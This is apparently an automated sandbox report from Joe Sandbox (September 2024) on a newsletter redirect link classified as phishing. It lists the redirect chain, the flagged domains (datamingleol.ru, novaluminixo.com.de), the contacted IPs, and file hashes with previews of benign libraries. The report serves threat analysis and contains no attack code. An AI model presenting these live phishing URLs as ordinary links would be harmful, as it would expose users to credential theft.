                                  https://link.mail.beehiiv.com/ls/click?upn=u001.GnayZpqmDAyzRgS-2FLYl4RHN2cUfFOeIl-2F1f4xU4pJOcOvFF5JtcDZgN2b8EHAYaIo8hY-2FiSOUbvCdN83bjar77Z6EUgwyI-2FCy-2BtXuqPzslheGB8fcZTPMT7qFbIvSx6J3qU13aPN2aWg8H0AZlaYIbwj-2B5XCPZJrYLR6gCX2KglI5rt-2BhosHmI3CIqw-2Baty2WnLa_5fUuPhWAFqmONK4vCqUUyg-2FVOuPn0yylbEGIy-2BMc2pKH-2FwT7XuJE6N4PO67SRFwySQfum6vpDJ012hBFpTMU70W7Buir5ITVUf4LKn1Jv3b9pmU2VE9FhtalGjGwNilzoSAQqq5GJ-2FYB4GD3Q-2Bxi0yZ0veGliTbI5N6309WAW1tAR5CJ0NAA3kd01PnWFZtXGE2PY7nO0TG-2BRlhqE6O-2BZ73glfaX9R5tgL90omfK9VLfe7S5ajPSPVc09ucdgDdi5o4tRSYRsw28AxCMwp5Bu6DmX9qBgSOCaN-2BeWmdxC48FJR0idjZC2UFQGDbMQmfdH8GcPHrUwd3BjyY7QM-2BTIOmHDZflDlZW-2BxkWn0MxKLRdOAE4Yvpa3nGd7OFHKFzanDID9NWAjTHOOKOlDF81iWzte2LvnOPk1djB-2B5RArbZ5CLoXqxNyOTfDKKrq2K8r&utm_source=substack&utm_medium=emailfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://link.sbstck.com/redirect/9f1a559b-1924-42a1-ac63-d801d0b621e3false
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review#true
                                    unknown
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8c2868a8da4d78e7&lang=autofalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://a.nel.cloudflare.com/report/v4?s=9H48XQCYQVOqdEDAvNY%2FZ1FL5zoYslT1KFEFFHE%2F%2B5%2BHZxaJJv7SvnAbg8ZnJGK6OUD8zV%2BO5nsXB8P7JVC0PTqO%2F3kMNlYdormBTwZmmnl0Mtn3JLpyyUAHjFgpmYwctTQ%3Dfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://datamingleol.ru/favicon.icofalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://challenges.cloudflare.com/turnstile/v0/b/388c99dd0998/api.jsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://maxcarerelocation.com/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-reviewfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://datamingleol.ru/tN2d/,false
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1687353129:1726229860:oEB8zH5MRkhXjxacAPu7VKa8059iC9rH2eRs5vHP1jU/8c2868a8da4d78e7/245501c248c6a2efalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8c2868a8da4d78e7/1726233357437/2e79c4b32ab76a8fbdddaf68a3bf5979d979c70dab68905b80a2d24b32c452d1/aclfuHDbeXB-GT0false
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://novaluminixo.com.de//true
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8c2868a8da4d78e7/1726233357439/wyw62HvqZvr0Hpvfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.jsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-reviewtrue
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://novaluminixo.com.de/#chromecache_62.2.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://cdn.jsdelivr.net/npm/bootstrapchromecache_62.2.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://novaluminixo.com.de/#modern-supercarschromecache_62.2.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://novaluminixo.com.de/#contactchromecache_62.2.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://novaluminixo.com.de/#termschromecache_62.2.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://novaluminixo.com.de/#learn-morechromecache_62.2.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://link.mail.beehiiv.com/ls/click?upn=u001.GnayZpqmDAyzRgS-2FLYl4RHN2cUfFOeIl-2F1f4xU4pJOcOvFF5chromecache_58.2.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://novaluminixo.com.de/#aboutchromecache_62.2.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://novaluminixo.com.de/#classic-carschromecache_62.2.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://novaluminixo.com.de/#faqchromecache_62.2.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.csschromecache_62.2.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://novaluminixo.com.de/#privacychromecache_62.2.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://novaluminixo.com.de/#electric-vehicleschromecache_62.2.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://novaluminixo.com.de/#serviceschromecache_62.2.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      104.17.24.14
                                      cdnjs.cloudflare.comUnited States
                                      13335CLOUDFLARENETUSfalse
                                      142.250.185.228
                                      www.google.comUnited States
                                      15169GOOGLEUSfalse
                                      104.18.95.41
                                      challenges.cloudflare.comUnited States
                                      13335CLOUDFLARENETUSfalse
                                      239.255.255.250
                                      unknownReserved
                                      unknownunknownfalse
                                      188.114.96.3
                                      datamingleol.ruEuropean Union
                                      13335CLOUDFLARENETUStrue
                                      151.101.66.137
                                      code.jquery.comUnited States
                                      54113FASTLYUSfalse
                                      45.67.14.24
                                      maxcarerelocation.comBulgaria
                                      207616ALTROSKYSCfalse
                                      35.190.80.1
                                      a.nel.cloudflare.comUnited States
                                      15169GOOGLEUSfalse
                                      104.18.68.40
                                      link.mail.beehiiv.comUnited States
                                      13335CLOUDFLARENETUSfalse
                                      IP
                                      192.168.2.4
                                      Joe Sandbox version:40.0.0 Tourmaline
                                      Analysis ID:1510815
                                      Start date and time:2024-09-13 15:14:49 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 3m 33s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:browseurl.jbs
                                      Sample URL:http://link.sbstck.com/redirect/9f1a559b-1924-42a1-ac63-d801d0b621e3
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:8
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.phis.win@21/20@32/10
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 142.250.185.238, 142.250.186.131, 66.102.1.84, 34.104.35.123, 20.12.23.50, 199.232.210.172, 192.229.221.95, 20.166.126.56, 20.3.187.198, 142.250.185.163
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: http://link.sbstck.com/redirect/9f1a559b-1924-42a1-ac63-d801d0b621e3
                                      No simulations
                                      No context
                                      No context
                                      No context
                                      No context
                                      No context
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                      Category:downloaded
                                      Size (bytes):61
                                      Entropy (8bit):3.990210155325004
                                      Encrypted:false
                                      SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                      MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                      SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                      SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                      SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                      Malicious:false
                                      Reputation:low
                                      URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                      Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (65447)
                                      Category:dropped
                                      Size (bytes):89501
                                      Entropy (8bit):5.289893677458563
                                      Encrypted:false
                                      SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                      Malicious:false
                                      Reputation:low
                                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (47261)
                                      Category:dropped
                                      Size (bytes):47262
                                      Entropy (8bit):5.3977431994288265
                                      Encrypted:false
                                      SSDEEP:768:+CWIsQ06lHHhw+E9sygguSwod+dq3VE3qVdze9Ddrl9eom1CQWpKexThupcubvCR:uQflHBW9sygg1NVixrlEM
                                      MD5:D7BB07B6ECD6FB1A2E123203006C33BA
                                      SHA1:09CC76938FA366E40992880FF94ACCD8BE0C6640
                                      SHA-256:8EAE5159C56BF66C17E0CB002B25FC2E343F3E009DC2A39A7E230F08B7B8C672
                                      SHA-512:D87C6B675EF3F260CC86BD130F91A08F5D07D301F2A7B14778C5CCF42BF0D605957FF653CA53C57203A85AADFF5F66F3514342A35DFAA581FBAF57FC3B72D722
                                      Malicious:false
                                      Reputation:low
                                      Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (47992), with no line terminators
                                      Category:dropped
                                      Size (bytes):47992
                                      Entropy (8bit):5.605846858683577
                                      Encrypted:false
                                      SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                      MD5:CF3402D7483B127DED4069D651EA4A22
                                      SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                      SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                      SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                      Malicious:false
                                      Reputation:low
                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (65447)
                                      Category:downloaded
                                      Size (bytes):89501
                                      Entropy (8bit):5.289893677458563
                                      Encrypted:false
                                      SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                      Malicious:false
                                      Reputation:low
                                      URL:https://code.jquery.com/jquery-3.6.0.min.js
                                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                      Category:downloaded
                                      Size (bytes):1249
                                      Entropy (8bit):5.242453121762845
                                      Encrypted:false
                                      SSDEEP:24:hYYIzD6yJRA3ZsjNQCRtgoLY95Mu56+eDHHLFCOXAkRcfRrzd0Ll72rKQk:rq6Kj2CZLY5Mc6NDLYzkYKLlOM
                                      MD5:F58515DFE987F7E027C8A71BBC884621
                                      SHA1:BEC6AEBF5940EA88FBBFF5748D539453D49FA284
                                      SHA-256:679E7E62B81267C93D0778083AE0FD0EFE24172FF0AC581835B54165B3D9ED43
                                      SHA-512:F085346A38318F7935D76909DB0367862924CC9B0D96256F7FF4E8999C041E610BBCDE8CA56C92673BDE0991C85E9C9D9B6726ABD91D0C3177462C80D4A99140
                                      Malicious:false
                                      Reputation:low
                                      URL:https://datamingleol.ru/favicon.ico
                                      Preview:<!DOCTYPE html>.<html style="height:100%">.<head>.<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.<title> 404 Not Found..</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>.<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">.<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">. <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>.<h2 style="margin-top:20px;font-size: 30px;">Not Found..</h2>.<p>The resource requested could not be found on this server!</p>.</div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 4 x 11, 8-bit/color RGB, non-interlaced
                                      Category:downloaded
                                      Size (bytes):61
                                      Entropy (8bit):4.002585360278503
                                      Encrypted:false
                                      SSDEEP:3:yionv//thPlJ0t/9yHxl/k4E08up:6v/lhPgtwH7Tp
                                      MD5:76DF3614B743E30BEC2BC2172AE864AC
                                      SHA1:6F502D82CBF121308DBC868A4BBF79B243722ECE
                                      SHA-256:078FDF9BC2AFE148CFF585FD2450D3A9BE8CC662885B2CB926992F3465D075C7
                                      SHA-512:040CBBCD37DD47797A656F2F2797B14EC09D099022A8A7B2A6E00C0378C6FC03831BBC18EA99347265D799A58E4B8B05AB7FF3A5A3C0BD99E0E10B71BE491C8C
                                      Malicious:false
                                      Reputation:low
                                      URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8c2868a8da4d78e7/1726233357439/wyw62HvqZvr0Hpv
                                      Preview:.PNG........IHDR....................IDAT.....$.....IEND.B`.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                      Category:dropped
                                      Size (bytes):61
                                      Entropy (8bit):3.990210155325004
                                      Encrypted:false
                                      SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                      MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                      SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                      SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                      SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                      Malicious:false
                                      Reputation:low
                                      Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:HTML document, ASCII text, with very long lines (2472), with no line terminators
                                      Category:downloaded
                                      Size (bytes):2472
                                      Entropy (8bit):6.048629309084218
                                      Encrypted:false
                                      SSDEEP:48:fPxxSygjRoxp64MsK2Ft9tCNDrygjRoxp64MsK2Ft9tCNWnnygjRoxp64MsK2Fty:f5aSxw4Mc9tCNDTSxw4Mc9tCNm3Sxw4Y
                                      MD5:4416C96EC9725FC496347008C709605D
                                      SHA1:D294FB75FBC3E2980F5A556DB26CBB97A91D31EF
                                      SHA-256:6707A4B502A96190DD460BEEAD795F6E019EA3D8DCDCC5229DAE70DAD9A48D2D
                                      SHA-512:3514606CC4BDC04030882CEF44450DBE9C56D721D7CCE482A6F9E0EB25FC75FEEF1312B5F250BC4A23D233C42BCDF8343286D838E2BF49FA631CDD479E714F40
                                      Malicious:false
                                      Reputation:low
                                      URL:https://link.sbstck.com/redirect/9f1a559b-1924-42a1-ac63-d801d0b621e3
                                      Preview:<head><noscript><META http-equiv="refresh" content="0;URL=https://link.mail.beehiiv.com/ls/click?upn=u001.GnayZpqmDAyzRgS-2FLYl4RHN2cUfFOeIl-2F1f4xU4pJOcOvFF5JtcDZgN2b8EHAYaIo8hY-2FiSOUbvCdN83bjar77Z6EUgwyI-2FCy-2BtXuqPzslheGB8fcZTPMT7qFbIvSx6J3qU13aPN2aWg8H0AZlaYIbwj-2B5XCPZJrYLR6gCX2KglI5rt-2BhosHmI3CIqw-2Baty2WnLa_5fUuPhWAFqmONK4vCqUUyg-2FVOuPn0yylbEGIy-2BMc2pKH-2FwT7XuJE6N4PO67SRFwySQfum6vpDJ012hBFpTMU70W7Buir5ITVUf4LKn1Jv3b9pmU2VE9FhtalGjGwNilzoSAQqq5GJ-2FYB4GD3Q-2Bxi0yZ0veGliTbI5N6309WAW1tAR5CJ0NAA3kd01PnWFZtXGE2PY7nO0TG-2BRlhqE6O-2BZ73glfaX9R5tgL90omfK9VLfe7S5ajPSPVc09ucdgDdi5o4tRSYRsw28AxCMwp5Bu6DmX9qBgSOCaN-2BeWmdxC48FJR0idjZC2UFQGDbMQmfdH8GcPHrUwd3BjyY7QM-2BTIOmHDZflDlZW-2BxkWn0MxKLRdOAE4Yvpa3nGd7OFHKFzanDID9NWAjTHOOKOlDF81iWzte2LvnOPk1djB-2B5RArbZ5CLoXqxNyOTfDKKrq2K8r&#38;utm_source=substack&#38;utm_medium=email"></noscript><title>https://link.mail.beehiiv.com/ls/click?upn=u001.GnayZpqmDAyzRgS-2FLYl4RHN2cUfFOeIl-2F1f4xU4pJOcOvFF5JtcDZgN2b8EHAYaIo8hY-2FiSOUbvCdN83bjar77Z6EUgw
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (47992), with no line terminators
                                      Category:downloaded
                                      Size (bytes):47992
                                      Entropy (8bit):5.605846858683577
                                      Encrypted:false
                                      SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                      MD5:CF3402D7483B127DED4069D651EA4A22
                                      SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                      SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                      SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                      Malicious:false
                                      Reputation:low
                                      URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (47261)
                                      Category:downloaded
                                      Size (bytes):47262
                                      Entropy (8bit):5.3977431994288265
                                      Encrypted:false
                                      SSDEEP:768:+CWIsQ06lHHhw+E9sygguSwod+dq3VE3qVdze9Ddrl9eom1CQWpKexThupcubvCR:uQflHBW9sygg1NVixrlEM
                                      MD5:D7BB07B6ECD6FB1A2E123203006C33BA
                                      SHA1:09CC76938FA366E40992880FF94ACCD8BE0C6640
                                      SHA-256:8EAE5159C56BF66C17E0CB002B25FC2E343F3E009DC2A39A7E230F08B7B8C672
                                      SHA-512:D87C6B675EF3F260CC86BD130F91A08F5D07D301F2A7B14778C5CCF42BF0D605957FF653CA53C57203A85AADFF5F66F3514342A35DFAA581FBAF57FC3B72D722
                                      Malicious:false
                                      Reputation:low
                                      URL:https://challenges.cloudflare.com/turnstile/v0/b/388c99dd0998/api.js
                                      Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 4 x 11, 8-bit/color RGB, non-interlaced
                                      Category:dropped
                                      Size (bytes):61
                                      Entropy (8bit):4.002585360278503
                                      Encrypted:false
                                      SSDEEP:3:yionv//thPlJ0t/9yHxl/k4E08up:6v/lhPgtwH7Tp
                                      MD5:76DF3614B743E30BEC2BC2172AE864AC
                                      SHA1:6F502D82CBF121308DBC868A4BBF79B243722ECE
                                      SHA-256:078FDF9BC2AFE148CFF585FD2450D3A9BE8CC662885B2CB926992F3465D075C7
                                      SHA-512:040CBBCD37DD47797A656F2F2797B14EC09D099022A8A7B2A6E00C0378C6FC03831BBC18EA99347265D799A58E4B8B05AB7FF3A5A3C0BD99E0E10B71BE491C8C
                                      Malicious:false
                                      Reputation:low
